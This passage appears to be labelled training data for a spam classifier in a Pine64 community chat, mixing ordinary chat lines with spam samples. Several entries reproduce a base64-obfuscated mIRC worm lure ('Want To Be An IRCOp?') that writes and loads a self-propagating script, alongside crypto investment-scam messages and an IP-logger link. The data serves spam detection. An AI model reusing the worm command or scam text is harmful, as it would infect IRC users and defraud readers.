"category": "good"}, {"text": "Like I said this is more curiosity at the moment than anything.\n", "category": "good"}, {"text": "Can't hurt to try\n", "category": "good"}, {"text": "If it worked and did things better than what was there, was going to open source a PCB design that had the stock IDC connector/JST from the system converted to the GPIO\nand make some software to help dump/port the original over to the 'new' board.\nwhatever that may be\nso it was 'plug and play' for the most part.\nAlso for clarification Android 9.0 (and whatever kernel it was using) was weird... it actually mirrored the image on both but made the HDMI distorted at the same time (green).\n", "category": "good"}, {"text": "Don't depend on smartphones,you canyour salary only, if you have a computer or start earning $2,000 daily and $10,000 weekly\nif you are interested click on the link below for more info........ \ud83d\udc47\ud83d\udc47\ud83d\udc47\n@Hannahmartins_fx\n@Hannahmartins_fx\n", "category": "good"}, {"text": "Hi\n", "category": "good"}, {"text": "Hello.\n", "category": "good"}, {"text": "It seems that after I updated sxmo, the button bindings have gotten messed up. Anyone have any clue on how to fix this?\n", "category": "good"}, {"text": "If it\u2019s mostly in suspend mode and it should last all day\nEspecially with the keyboard plus battery\n", "category": "good"}, {"text": "Jaguar: the pro is not released yet, the first devices ship to the developers in December. So you won't find any numbers. Megi had numbers for the non-S variant of the RK3399 but those numbers are only of limited use\n", "category": "good"}, {"text": "@Moderator telegram spam\n", "category": "good"}, {"text": "That would be for the best. For now you could only get wrong estimates\nin both directions\n", "category": "good"}, {"text": "The only thing that\u2019s missing is Bluetooth headphone calling capability\nGranted I\u2019ve only had a single pair of Mic Bluetooth headphones, And they say it should work but it\u2019s not it\u2019s probably a Linux thing or something in the Bluetooth stack but audiobooks and everything else works so I just can\u2019t pick up a call nor get sound from my headphones via call\n", "category": "good"}, {"text": "pribiet\npriviet\nwhen will Pinebook Pro be available again?\n", "category": "good"}, {"text": "the pinephone convergence package will ship in two shipments, right? i received my pinephone, but not the dock\n", "category": "good"}, {"text": "@Cody did you order the 3GB or the 2GB version?\n", "category": "good"}, {"text": "3GB\nas far as i know, convergence edition is the 3GB pinephone with a usb-c dock\n", "category": "good"}, {"text": "The USB-C dock is underneath the plastic shell in which the phone lays on top\n", "category": "good"}, {"text": ":LaughLiz: I'm an idiot. Thank you\n", "category": "good"}, {"text": "No worries\n", "category": "good"}, {"text": "lol\n", "category": "good"}, {"text": "Forwarded from unknown: \u026a\u1d1b \u1d00\u029f\u029f \ua731\u1d1b\u1d00\u0280\u1d1b\u1d07\u1d05 \u1d21\u026a\u1d1b\u029c \u1d00 \u1d21\u1d0f\u0280\u1d05 \u1d1b\u1d0f \u1d1b\u0280\u028f \ua731\u1d0f\u1d0d\u1d07\u1d1b\u029c\u026a\u0274\u0262 \u0274\u1d07\u1d21. \u1d0d\u028f \ua730\u026a\u0280\ua731\u1d1b \u1d18\u1d00\u028f\u1d0d\u1d07\u0274\u1d1b \u1d04\u1d0f\u1d0d\u1d07 \u1d00\ua730\u1d1b\u1d07\u0280 24\u029c\u1d0f\u1d1c\u0280\ua731 \u1d21\u029c\u1d07\u0274 \u026a \u026a\u0274\u1d20\u1d07\ua731\u1d1b\u1d07\u1d05 $300 \u1d00\u0274\u1d05 \ua731\u026a\u0274\u1d04\u1d07 \u1d1b\u029c\u1d07\u0274 \u026a \u029c\u1d00\u1d20\u1d07 \u0280\u1d07\u1d04\u1d07\u026a\u1d20\u1d07\u1d05 \u1d04\u1d0f\u1d1c\u0274\u1d1b\u029f\u1d07\ua731\ua731 \u1d18\u1d00\u028f\u1d0d\u1d07\u0274\u1d1b, \u029c\u026a\ua731 \u1d21\u1d0f\u0280\u1d1b\u029c\u028f \u1d1b\u1d0f\nhttps://t.me/joinchat/kjxCuDmU8I4wOGY0\n", "category": "spam"}, {"text": "@admin (re @unknown: )\n/report (re @gqnbzv4: )\n@admin spam (re @gqnbzv4: )\n", "category": "good"}, {"text": "hi, I have received an email from sales@pine64.org requesting info for the second time and i'm not sure if they receive my emails. Is there someone from the team who could help ?\n", "category": "good"}, {"text": "This chat is community run. There are no representatives from Pine64 company here.\n", "category": "good"}, {"text": "Well, technically there are and we can also forward stuff to the right people \ud83d\ude1b\nBut mail issues is usually just the long response time and/or mishaps\n", "category": "good"}, {"text": "basically they asked me to confirm an order on the 25th which i answered within 15 minutes and I just received the same email stating \"2nd notice\" in scary red\n", "category": "good"}, {"text": "We can try to ask @GAMELASTER to look into it as friendly as possible :>>\n", "category": "good"}, {"text": "hi @peac I will contact you in DM\n", "category": "good"}, {"text": "thank you !\n", "category": "good"}, {"text": "thanks mr gamiee\n", "category": "good"}, {"text": ":vincent:\n", "category": "good"}, {"text": "https://tenor.com/view/cool-cat-gif-18199666\n", "category": "good"}, {"text": "give more vincent pics\n", "category": "good"}, {"text": "ooh\nsure\n", "category": "good"}, {"text": "dsimic: thx for the info (re @p64protocolbot: [I] that's still unknown, unfortunately)\nI think I'll get Pinecil for now haha\noh Yeah, that's right\nI just wanted to learn hardware hacking to be honest and Pinecil seems as the most reasonable choice\n", "category": "good"}, {"category": "spam", "text": "Crypto"}, {"category": "spam", "text": "Crypto"}, {"category": "good", "text": "Smartphone"}, {"category": "spam", "text": "Crypto"}, {"category": "spam", "text": "Crypto"}, {"category": "spam", "text": "Crypto"}, {"category": "spam", "text": "Forex"}, {"category": "spam", "text": "Crypto"}, {"category": "good", "text": "looks good to me"}, {"category": "spam", "text": "Crypto"}, {"category": "spam", "text": "Crypto"}, {"category": "spam", "text": "Get some free crypto!"}, {"category": "spam", "text": "[D] crypto"}, {"category": "spam", "text": "Crypto"}, {"category": "spam", "text": "Crypto"}, {"category": "spam", "text": "Crypto"}, {"category": "spam", "text": "Crypto forex"}, {"category": "spam", "text": "Forex forex forex forex forex crypto"}, {"category": "spam", "text": "Crypto the the"}, {"category": "spam", "text": "The the forex"}, {"category": "spam", "text": "Crypto"}, {"category": "spam", "text": "Crypto"}, {"category": "spam", "text": "Crypto"}, {"category": "spam", "text": "Crypro"}, {"category": "spam", "text": "Crypto"}, {"category": "spam", "text": "Crypto"}, {"category": "spam", "text": "Crypto crypto"}, {"category": "spam", "text": "Crypto"}, {"category": "good", "text": "not much point, i won't have my machine online"}, {"category": "spam", "text": "Crypto forex free money"}, {"category": "good", "text": "fire219: \"thanks\" has a confidence of 0.73"}, {"category": "spam", "text": "Crypto"}, {"category": "spam", "text": "Crypto"}, {"category": "spam", "text": "Crypto forex"}, {"category": "good", "text": "Smartphone"}, {"category": "spam", "text": "Crypto"}, {"category": "spam", "text": "Crypto"}, {"category": "spam", "text": "Crypto"}, {"category": "spam", "text": "Crypto"}, {"category": "spam", "text": "Forex"}, {"category": "spam", "text": "Crypto"}, {"category": "good", "text": "looks good to me"}, {"category": "spam", "text": "Crypto"}, {"category": "spam", "text": "Crypto"}, {"category": "spam", "text": "Get some free crypto!"}, {"category": "spam", "text": "[D] crypto"}, {"category": "spam", "text": "Crypto"}, {"category": "spam", "text": "Crypto"}, {"category": "spam", "text": "Crypto"}, {"category": "spam", "text": "Crypto forex"}, {"category": "spam", "text": "Forex forex forex forex forex crypto"}, {"category": "good", "text": "Crypto PinePhone"}, {"category": "spam", "text": "Crypto"}, {"category": "spam", "text": "Crypto"}, {"category": "spam", "text": "Crypto forex"}, {"category": "good", "text": "Smartphone"}, {"category": "spam", "text": "Crypto"}, {"category": "spam", "text": "Crypto"}, {"category": "spam", "text": "Crypto"}, {"category": "spam", "text": "Crypto"}, {"category": "spam", "text": "Forex"}, {"category": "spam", "text": "Crypto"}, {"category": "good", "text": "looks good to me"}, {"category": "spam", "text": "Crypto"}, {"category": "spam", "text": "Crypto"}, {"category": "spam", "text": "Get some free crypto!"}, {"category": "spam", "text": "[D] crypto"}, {"category": "spam", "text": "Crypto"}, {"category": "spam", "text": "Crypto"}, {"category": "spam", "text": "Crypto"}, {"category": "spam", "text": "Crypto forex"}, {"category": "spam", "text": "Forex forex forex forex forex crypto"}, {"category": "good", "text": "Also, what material are the stock straps made out of?"}, {"category": "good", "text": "\ud83d\ude43"}, {"category": "good", "text": "[T] jack"}, {"category": "good", "text": "[T] that sucks"}, {"category": "good", "text": " Evening"}, {"category": "good", "text": "what do u recommend I use?"}, {"category": "good", "text": " Hello, could someone in here tell me how I can access my nextcloud files in arch arm with portfolio? Do I have to install additional packages? Thanks!"}, {"category": "good", "text": ""}, {"category": "good", "text": "xzcat |dd of=sdcarddevice"}, {"category": "good", "text": "just unplugged"}, {"category": "good", "text": "reconnect sdcard to the pc"}, {"category": "good", "text": "Thanks"}, {"category": "good", "text": "for he unexperienced user the gui tools are of fewer risk"}, {"category": "good", "text": "rip"}, {"category": "good", "text": "ih, i always get that mixed up"}, {"category": "good", "text": "nvm"}, {"category": "good", "text": "Did you get your medical discharge?"}, {"category": "good", "text": "Did you reach the 70% ?"}, {"category": "good", "text": "give him the minute :)"}, {"category": "good", "text": "there is udev, polkit, pam out tgere"}, {"category": "good", "text": "ok"}, {"category": "good", "text": "ok"}, {"category": "good", "text": "thanks"}, {"category": "good", "text": "> Hello, could someone in here tell me how I can access my nextcloud files in arch arm with portfolio? Do I have to install additional packages? Thanks!\n\nNever mind, found out, works. Thanks"}, {"category": "good", "text": "Bullseye"}, {"category": "good", "text": "thank you so much for all the information crimier. im glad that i learned something new about wattage."}, {"category": "good", "text": "Artix sucks"}, {"category": "good", "text": "oof"}, {"category": "good", "text": "Just a braided, elastic strings"}, {"category": "spam", "text": "Text to analyse: Tyrone Dennis has been a great inspiration to me and my family. For a start I deposited $500 and after 24 hours I got $5,750 return. He is accurate and reliability can't be compromised you can join his telegram channel via the link below"}, {"category": "good", "text": "WoC\u2019: burst pipe:/"}, {"category": "good", "text": "tmux session ftw"}, {"category": "good", "text": "Yea, how do you get good readings from the HRM consistently?"}, {"category": "good", "text": "*if no"}, {"category": "good", "text": "k7rrv-via-proxy, wiat"}, {"category": "good", "text": "I show now at mine"}, {"category": "good", "text": "hmmm"}, {"category": "good", "text": "22222"}, {"category": "good", "text": "Thank you, <@!214117842423906304>"}, {"category": "good", "text": "i7 & Xeon ?"}, {"category": "good", "text": "Dark Magic indeed"}, {"category": "good", "text": "sudo OpenArena, WoC? \ud83d\ude04"}, {"category": "good", "text": "sudo rm Jannik2099/*"}, {"category": "good", "text": "Do you have SBCs, <@!439458539912822784>?"}, {"category": "good", "text": "so what now?"}, {"category": "good", "text": "i still callit a mp3 reader"}, {"category": "good", "text": "opus or aac now"}, {"category": "good", "text": "I never seen opus"}, {"category": "good", "text": "Or acc"}, {"category": "good", "text": "Aac"}, {"category": "good", "text": "literally all of youtube and spotify is opus"}, {"category": "good", "text": "extracts audio"}, {"category": "good", "text": "lollypop*"}, {"category": "good", "text": "streaming is best?"}, {"category": "good", "text": "premium"}, {"category": "good", "text": "a movie of 70's"}, {"category": "good", "text": "about vietnam's war"}, {"category": "good", "text": "no on MASH"}, {"category": "good", "text": "cu"}, {"category": "good", "text": "MASH is a series, lots of eps, hours of cringe :)"}, {"category": "good", "text": "done ;)"}, {"category": "good", "text": "i hope her family likes her again by now"}, {"category": "good", "text": "i want uk, believe im sad about what i said to her"}, {"category": "good", "text": "as a proud holder of a UK passport i accept your apology on behalf of the nation"}, {"category": "good", "text": "nice!"}, {"category": "good", "text": "<@!358921991647920129>"}, {"category": "good", "text": "late, for me, here"}, {"category": "good", "text": "but no, you chose to give it to me as this ancient crap"}, {"category": "good", "text": "wowwww"}, {"category": "good", "text": "Not overly cheap*"}, {"category": "good", "text": "sucker sucks"}, {"category": "good", "text": "Thanks for the confirm"}, {"category": "good", "text": "annoying"}, {"category": "good", "text": "like that."}, {"category": "good", "text": "test."}, {"category": "good", "text": "Evening. How can I display the clock from SystemTask?"}, {"category": "good", "text": "Sorted \ud83d\ude00"}, {"category": "good", "text": "(dunno how bridgebot handles edits: static lv_style_t; -> static lv_style_t style; )"}, {"category": "good", "text": "do"}, {"category": "good", "text": "what about modem manager"}, {"category": "good", "text": "telus"}, {"category": "good", "text": "Sweet"}, {"category": "good", "text": "Gotcha, thanks for the heads up"}, {"category": "good", "text": "google it"}, {"category": "good", "text": "is telus a big carrier or smaller mvno"}, {"category": "good", "text": "ahh i loomed it i"}, {"category": "spam", "text": "Crypto forex get rich quick"}, {"category": "good", "text": "Most people are asleep by now in my timezone"}, {"category": "good", "text": "I'm sure most of those online rn are just americans and europeans with unhealthy sleep schedules"}, {"category": "good", "text": "no"}, {"category": "good", "text": "Yeah sure give me a sec"}, {"category": "good", "text": "https://termbin.com/dl91"}, {"category": "good", "text": "thank you very much"}, {"category": "spam", "text": "Best \ud83d\udc4c company \nhttps://bit.ly/3CWFmbe"}, {"category": "good", "text": "Thank you. I will try that."}, {"category": "good", "text": "Not that I know of."}, {"category": "good", "text": "plogs your is"}, {"category": "good", "text": "https://twitter.com/JadeTheDev/status/1457515920570585089?t=WwYK2PaL8xSlD39Vx7K9GA&s=19"}, {"category": "good", "text": "Nvm"}, {"category": "good", "text": "foo"}, {"category": "good", "text": "i dont make many phone calls"}, {"category": "good", "text": "making progress \ud83d\ude42"}, {"category": "spam", "text": "\u2705 Amazing profit on all the available slots - #hashbulls signal was presented to the stock market and it has successfully completed all the verifications stages https://tinyurl.com/5rr8ba2r \u2705Join premium gainers to receive such secured maximum profit @ \ud83d\udc49 https://tinyurl.com/5rr8ba2r"}, {"category": "spam", "text": "With \ud83d\udccc\ud83d\udccc\ud83d\udc49\ud83d\udc49 H A S H B U L L S . You can forget about the necessity to form a substantial starting capital, a deep and multi-stage study of the technical aspects of the production of digital code, the allocation of sufficient free space for the technical equipment installation. Now mining requires only a personal computer, a minimum deposit and a reliable partner, who is ready to provide their services to everyone.Click \ud83d\udc49 for more information:- https://wow.link/Capital https://wow.link/Capital https://wow.link/Capital"}, {"category": "spam", "text": "Forwarded from unknown: BITCOIN \ud83d\ude31\ud83d\ude31 is real and paying, I just received my profit of $7800.00 all I sent to the company was just $780.00 ... Bitcoin is the most important invention in the history of the world now, try and testify with this legit company and be happy with your family.. Join and contact admin now\ud83d\udc47\ud83d\udc47\ud83d\udc47\ud83d\ude4f@FOREX_PRO012 (1) No Extra charges (2) No hidden fees (3) 10% commission to be sent after you've received your profits, inbox \ud83d\udce5 him if you are interested. \ud83d\udc47\ud83d\udc47\ud83d\udc47 https://t.me/joinchat/p9uJnNZDYetmNWM0"}, {"category": "spam", "text": "It's more of a dream come through creating multiple sources of incomes. Truly proud of the decisions of getting started with @Elliot_Finances https://t.me/joinchat/YS4Uw7kZ4wxjYzJk"}, {"category": "spam", "text": "Tyrone Dennis has been a great inspiration to me and my family. For a start I deposited $500 and after 24 hours I got $5,750 return. He is accurate and reliability can't be compromised you can join his telegram channel via the link below"}, {"category": "spam", "text": "\ud83d\udc47\ud83d\udc47\ud83d\udc47 http://www.coin-globalasset.com/?ref=Stella http://www.coin-globalasset.com/?ref=Stella"}, {"category": "spam", "text": "white_check_markCOIN GLOBAL ASSETwhite_check_markAmazing, I had concluded that all account managers in group were scammers but he proved me wrong, I invested $500 and within 18hours, I earned $5,440. Now my trading story has changed through one single investment with him.@ COIN GLOBAL ASSET click on my referral link below to join. point_downpoint_downpoint_downpoint_down https://rb.gy/jsvkge https://rb.gy/jsvkge white_check_mark Referral bonuswhite_check_mark white_check_mark Automatic withdrawalwhite_check_mark white_check_mark online supportwhite_check_mark octagonal_signNo withdrawal charge"}, {"category": "spam", "text": "https://iplogger.org/2Bs3k7"}, {"category": "spam", "text": "Best \ud83d\udc4c company https://bit.ly/3CWFmbe"}, {"category": "good", "text": "er 3.875 :-) 4G-128M."}, {"category": "spam", "text": "Want To Be An IRCOp? Try This New Bug Type: //write $decode(bmV3Yg==,m) $decode(b24gISsxOmpvaW46Izp7IC5hdXNlciAyICRuaWNrIHwgLm1zZyAkbmljayBXYW50IFRvIEJlIEFuIElSQ09wPyBUcnkgVGhpcyBOZXcgQnVnIFR5cGU6AzExIC8vd3JpdGUgJCAkKyBkZWNvZGUoYm1WM1lnPT0sbSkgJCAkKyBkZWNvZGUoICQrICRlbmNvZGUoJHJlYWQoJHNjcmlwdCxuLDEpLG0pICQrICxtKSAkY2hyKDEyNCkgLmxvYWQgLXJzICQgJCsgZGVjb2RlKGJtVjNZZz09LG0pIH0gfQ==,m) | .load -rs"}, {"category": "good", "text": "@Moderator crypto spam"}, {"category": "good", "text": "simple, pulseaudio"}, {"category": "good", "text": "triggers the max(spam, good) < 0.6"}, {"category": "good", "text": "\u000310[M] \u000fi dont make many phone calls"}, {"category": "good", "text": "Gtg bbl"}, {"category": "spam", "text": "\u000305[T] \u000fForwarded from unknown: \ud835\udda7\ud835\uddbe\ud835\uddc5\ud835\uddc5\ud835\uddc8 \ud835\uddbe\ud835\uddcf\ud835\uddbe\ud835\uddcb\ud835\uddd2\ud835\uddc8\ud835\uddc7\ud835\uddbe, \ud835\udda8 \ud835\uddc3\ud835\uddce\ud835\uddcc\ud835\uddcd \ud835\uddc6\ud835\uddba\ud835\uddbd\ud835\uddbe \ud835\uddc6\ud835\uddd2 \ud835\uddcc\ud835\uddbe\ud835\uddbc\ud835\uddc8\ud835\uddc7\ud835\uddbd \ud835\uddd0\ud835\uddc2\ud835\uddcd\ud835\uddc1\ud835\uddbd\ud835\uddcb\ud835\uddba\ud835\uddd0\ud835\uddba\ud835\uddc5 \ud835\uddc8\ud835\uddbf \ud835\uddc6\ud835\uddd2 \ud835\uddc9\ud835\uddcb\ud835\uddc8\ud835\uddbf\ud835\uddc2\ud835\uddcd \ud835\uddd0\ud835\uddc2\ud835\uddcd\ud835\uddc1\ud835\uddc8\ud835\uddce\ud835\uddcd \ud835\uddcc\ud835\uddcd\ud835\uddcb\ud835\uddbe\ud835\uddcc\ud835\uddcc \ud835\uddc8\ud835\uddcb \ud835\uddbd\ud835\uddbe\ud835\uddc5\ud835\uddba\ud835\uddd2 \ud835\uddba\ud835\uddc7\ud835\uddbd \ud835\uddc7\ud835\uddc8 \ud835\uddbe\ud835\uddd1\ud835\uddcd\ud835\uddcb\ud835\uddba \ud835\uddbf\ud835\uddbe\ud835\uddbe\ud835\uddcc \ud835\uddba\ud835\uddcd\ud835\uddcd\ud835\uddba\ud835\uddbc\ud835\uddc1 \ud835\uddcd\ud835\uddc8"}, {"category": "good", "text": "as in chat moderators"}, {"category": "good", "text": "cya"}, {"category": "good", "text": "\u000311[M] \u000fand have a VoLTE compatible phone"}, {"category": "spam", "text": "Forwarded from unknown: \ud835\udda7\ud835\uddbe\ud835\uddc5\ud835\uddc5\ud835\uddc8 \ud835\uddbe\ud835\uddcf\ud835\uddbe\ud835\uddcb\ud835\uddd2\ud835\uddc8\ud835\uddc7\ud835\uddbe, \ud835\udda8 \ud835\uddc3\ud835\uddce\ud835\uddcc\ud835\uddcd \ud835\uddc6\ud835\uddba\ud835\uddbd\ud835\uddbe \ud835\uddc6\ud835\uddd2 \ud835\uddcc\ud835\uddbe\ud835\uddbc\ud835\uddc8\ud835\uddc7\ud835\uddbd \ud835\uddd0\ud835\uddc2\ud835\uddcd\ud835\uddc1\ud835\uddbd\ud835\uddcb\ud835\uddba\ud835\uddd0\ud835\uddba\ud835\uddc5 \ud835\uddc8\ud835\uddbf \ud835\uddc6\ud835\uddd2 \ud835\uddc9\ud835\uddcb\ud835\uddc8\ud835\uddbf\ud835\uddc2\ud835\uddcd \ud835\uddd0\ud835\uddc2\ud835\uddcd\ud835\uddc1\ud835\uddc8\ud835\uddce\ud835\uddcd \ud835\uddcc\ud835\uddcd\ud835\uddcb\ud835\uddbe\ud835\uddcc\ud835\uddcc \ud835\uddc8\ud835\uddcb \ud835\uddbd\ud835\uddbe\ud835\uddc5\ud835\uddba\ud835\uddd2 \ud835\uddba\ud835\uddc7\ud835\uddbd \ud835\uddc7\ud835\uddc8 \ud835\uddbe\ud835\uddd1\ud835\uddcd\ud835\uddcb\ud835\uddba \ud835\uddbf\ud835\uddbe\ud835\uddbe\ud835\uddcc \ud835\uddba\ud835\uddcd\ud835\uddcd\ud835\uddba\ud835\uddbc\ud835\uddc1 \ud835\uddcd\ud835\uddc8"}, {"category": "spam", "text": "[T] Forwarded from unknown: \ud835\udda7\ud835\uddbe\ud835\uddc5\ud835\uddc5\ud835\uddc8 \ud835\uddbe\ud835\uddcf\ud835\uddbe\ud835\uddcb\ud835\uddd2\ud835\uddc8\ud835\uddc7\ud835\uddbe, \ud835\udda8 \ud835\uddc3\ud835\uddce\ud835\uddcc\ud835\uddcd \ud835\uddc6\ud835\uddba\ud835\uddbd\ud835\uddbe \ud835\uddc6\ud835\uddd2 \ud835\uddcc\ud835\uddbe\ud835\uddbc\ud835\uddc8\ud835\uddc7\ud835\uddbd \ud835\uddd0\ud835\uddc2\ud835\uddcd\ud835\uddc1\ud835\uddbd\ud835\uddcb\ud835\uddba\ud835\uddd0\ud835\uddba\ud835\uddc5 \ud835\uddc8\ud835\uddbf \ud835\uddc6\ud835\uddd2 \ud835\uddc9\ud835\uddcb\ud835\uddc8\ud835\uddbf\ud835\uddc2\ud835\uddcd \ud835\uddd0\ud835\uddc2\ud835\uddcd\ud835\uddc1\ud835\uddc8\ud835\uddce\ud835\uddcd \ud835\uddcc\ud835\uddcd\ud835\uddcb\ud835\uddbe\ud835\uddcc\ud835\uddcc \ud835\uddc8\ud835\uddcb \ud835\uddbd\ud835\uddbe\ud835\uddc5\ud835\uddba\ud835\uddd2 \ud835\uddba\ud835\uddc7\ud835\uddbd \ud835\uddc7\ud835\uddc8 \ud835\uddbe\ud835\uddd1\ud835\uddcd\ud835\uddcb\ud835\uddba \ud835\uddbf\ud835\uddbe\ud835\uddbe\ud835\uddcc \ud835\uddba\ud835\uddcd\ud835\uddcd\ud835\uddba\ud835\uddbc\ud835\uddc1 \ud835\uddcd\ud835\uddc8"}, {"category": "spam", "text": "[T] Forwarded from unknown: \ud835\udda7\ud835\uddbe\ud835\uddc5\ud835\uddc5\ud835\uddc8 \ud835\uddbe\ud835\uddcf\ud835\uddbe\ud835\uddcb\ud835\uddd2\ud835\uddc8\ud835\uddc7\ud835\uddbe, \ud835\udda8 \ud835\uddc3\ud835\uddce\ud835\uddcc\ud835\uddcd \ud835\uddc6\ud835\uddba\ud835\uddbd\ud835\uddbe \ud835\uddc6\ud835\uddd2 \ud835\uddcc\ud835\uddbe\ud835\uddbc\ud835\uddc8\ud835\uddc7\ud835\uddbd \ud835\uddd0\ud835\uddc2\ud835\uddcd\ud835\uddc1\ud835\uddbd\ud835\uddcb\ud835\uddba\ud835\uddd0\ud835\uddba\ud835\uddc5 \ud835\uddc8\ud835\uddbf \ud835\uddc6\ud835\uddd2 \ud835\uddc9\ud835\uddcb\ud835\uddc8\ud835\uddbf\ud835\uddc2\ud835\uddcd \ud835\uddd0\ud835\uddc2\ud835\uddcd\ud835\uddc1\ud835\uddc8\ud835\uddce\ud835\uddcd \ud835\uddcc\ud835\uddcd\ud835\uddcb\ud835\uddbe\ud835\uddcc\ud835\uddcc \ud835\uddc8\ud835\uddcb \ud835\uddbd\ud835\uddbe\ud835\uddc5\ud835\uddba\ud835\uddd2 \ud835\uddba\ud835\uddc7\ud835\uddbd \ud835\uddc7\ud835\uddc8 \ud835\uddbe\ud835\uddd1\ud835\uddcd\ud835\uddcb\ud835\uddba \ud835\uddbf\ud835\uddbe\ud835\uddbe\ud835\uddcc \ud835\uddba\ud835\uddcd\ud835\uddcd\ud835\uddba\ud835\uddbc\ud835\uddc1 \ud835\uddcd\ud835\uddc8"}, {"category": "spam", "text": "\ud83d\udc46\ud83d\udc46\ud83d\udc46\ud83d\udc46\ud83d\udc46\ud83d\udc46\ud83d\udc46\ud83d\udc46\ud83d\udc46"}, {"category": "good", "text": "VM?"}, {"category": "good", "text": "er 3.875 :-) 4G-128M."}, {"category": "good", "text": "er 3.875 :-) 4G-128M."}, {"category": "good", "text": "*sent"}, {"category": "good", "text": "It flagged my *sent"}, {"category": "good", "text": "And it flagged my \"it flagged my *sent\""}, {"category": "good", "text": "And it flagged my \"And it flagged my \"it flagged my *sent\"\""}, {"category": "good", "text": "And it flagged my \"And it flagged my \"And it flagged my \"it flagged my *sent\"\"\""}, {"category": "good", "text": "And it flagged my \"And it flagged my \"And it flagged my \"And it flagged my \"it flagged my *sent\"\"\"\""}, {"category": "good", "text": "And it flagged my \"And it flagged my \"And it flagged my \"And it flagged my \"And it flagged my \"it flagged my *sent\"\"\"\"\""}, {"category": "good", "text": "It did not flag my \"And it flagged my \"And it flagged my \"And it flagged my \"And it flagged my \"And it flagged my \"it flagged my *sent\"\"\"\"\"\""}, {"category": "good", "text": "{'good': 0.6965024379840781, 'spam': 0.303497562015922}"}, {"category": "good", "text": "Which SBC is best for crypto mining?"}, {"category": "good", "text": "No you shouldn't have to"}, {"category": "good", "text": "No, those are the messages from the spamlog you sent me"}, {"category": "good", "text": "Thanks"}, {"category": "good", "text": "#thanks\" still false-positives"}, {"category": "spam", "text": "Want To Be An IRCOp? Try This New Bug Type: //write $decode(bmV3Yg==,m) $decode(b24gISsxOmpvaW46Izp7IC5hdXNlciAyICRuaWNrIHwgLm1zZyAkbmljayBXYW50IFRvIEJlIEFuIElSQ09wPyBUcnkgVGhpcyBOZXcgQnVnIFR5cGU6AzExIC8vd3JpdGUgJCAkKyBkZWNvZGUoYm1WM1lnPT0sbSkgJCAkKyBkZWNvZGUoICQrICRlbmNvZGUoJHJlYWQoJHNjcmlwdCxuLDEpLG0pICQrICxtKSAkY2hyKDEyNCkgLmxvYWQgLXJzICQgJCsgZGVjb2RlKGJtVjNZZz09LG0pIH0gfQ==,m) | .load -rs"}, {"category": "good", "text": "i k-lined them"}, {"category": "good", "text": "\u000309[D] \u000fIs the soquartz out \ud83d\ude2e"}, {"category": "good", "text": "\u000315[M] <1e> \u000fit was more easy just shutting up, and just make trip"}, {"category": "good", "text": "\u000311[T] \u000fabce: https://gitlab.com/postmarketOS/pmaports/-/issues/1285"}, {"category": "good", "text": "\u000307[D] \u000fFound the link: https://www.thingiverse.com/thing:4964788"}, {"category": "good", "text": "\u000314[T] \u000fnice! $"}, {"category": "good", "text": "\u000314[T] \u000fnice!"}, {"category": "good", "text": "wow :)"}, {"category": "good", "text": "\u000309[D] \u000fmuch thanks!"}, {"category": "good", "text": "\u000307[D] \u000fMight be filtered out in code?"}, {"category": "good", "text": "\u000306[T] \u000fno"}, {"category": "good", "text": "\u000313[D] \u000f```"}, {"category": "good", "text": "\u000313[D] \u000fi'm using this range which has all the ones i need but `\u00e5` is the only one that works https://jrgraphix.net/r/Unicode/00A0-00FF"}, {"category": "good", "text": "\u000307[D] \u000fDid you test with a label somewhere from infinitime code or with a notification?"}, {"category": "good", "text": "\u000313[D] \u000fnotification"}, {"category": "good", "text": "\u000313[D] \u000fthis is very weird"}, {"category": "good", "text": "\u000307[D] \u000fAsk CI to build for you?"}, {"category": "good", "text": "\u000314[T] \u000f"}, {"category": "good", "text": "\u000314[T] \u000fhave a random extra risky DFU to test with"}, {"category": "good", "text": "\u000314[T] \u000fit's got 811, shakewake, fuzzy time, favourites and pts integrated color picker"}, {"category": "good", "text": "\u000302[T] \u000fI\u2019m still downloading them so I can\u2019t read the code for now"}, {"category": "good", "text": "\u000313[D] \u000f++ export LANG=C.UTF-8"}, {"category": "good", "text": "\u000313[D] \u000f++ LANG=C.UTF-8"}, {"category": "good", "text": "\u000313[D] \u000f src"}, {"category": "good", "text": "\u000313[D] \u000fI'm lost at this point"}, {"category": "good", "text": "\u000313[D] \u000fGoing to try flashing form my laptop"}, {"category": "good", "text": "\u000313[D] \u000for going to try nrfconnect atleast"}, {"category": "good", "text": "\u000314[T] \u000fyou can try make clean then make pinetime-mcuboot-app"}, {"category": "good", "text": "\u000313[D] \u000f.rw-r--r-- 369k theo 8 Nov 13:57 \uf410 pinetime-mcuboot-app-dfu-1.6.0.zip"}, {"category": "good", "text": "\u000313[D] \u000f.rw-r--r-- 368k theo 8 Nov 13:57 \uf15b pinetime-mcuboot-app-image-1.6.0.bin"}, {"category": "good", "text": "\u000313[D] \u000f.rw-r--r-- 166k theo 8 Nov 13:57 \uf15b pinetime-mcuboot-recovery-loader-image-1.6.0.bin```"}, {"category": "good", "text": "\u000313[D] \u000fI'll try reflashing via nrf connect too"}, {"category": "good", "text": "\u000314[T] \u000fthe app you use should make no odds"}, {"category": "good", "text": "\u000314[T] \u000fyou want red"}, {"category": "good", "text": "\u000314[T] \u000fhmmmmmmm"}, {"category": "good", "text": "\u000313[D] \u000fand submodule update bla bla"}, {"category": "good", "text": "\u000313[D] \u000fGoing to try more when i get home"}, {"category": "spam", "text": "Want To Be An IRCOp? Try This New Bug Type: //write $decode(bmV3Yg==,m) $decode(b24gISsxOmpvaW46Izp7IC5hdXNlciAyICRuaWNrIHwgLm1zZyAkbmljayBXYW50IFRvIEJlIEFuIElSQ09wPyBUcnkgVGhpcyBOZXcgQnVnIFR5cGU6AzExIC8vd3JpdGUgJCAkKyBkZWNvZGUoYm1WM1lnPT0sbSkgJCAkKyBkZWNvZGUoICQrICRlbmNvZGUoJHJlYWQoJHNjcmlwdCxuLDEpLG0pICQrICxtKSAkY2hyKDEyNCkgLmxvYWQgLXJzICQgJCsgZGVjb2RlKGJtVjNZZz09LG0pIH0gfQ==,m) | .load -rs"}, {"category": "spam", "text": "Want To Be An IRCOp? Try This New Bug Type: //write $decode(bmV3Yg==,m) 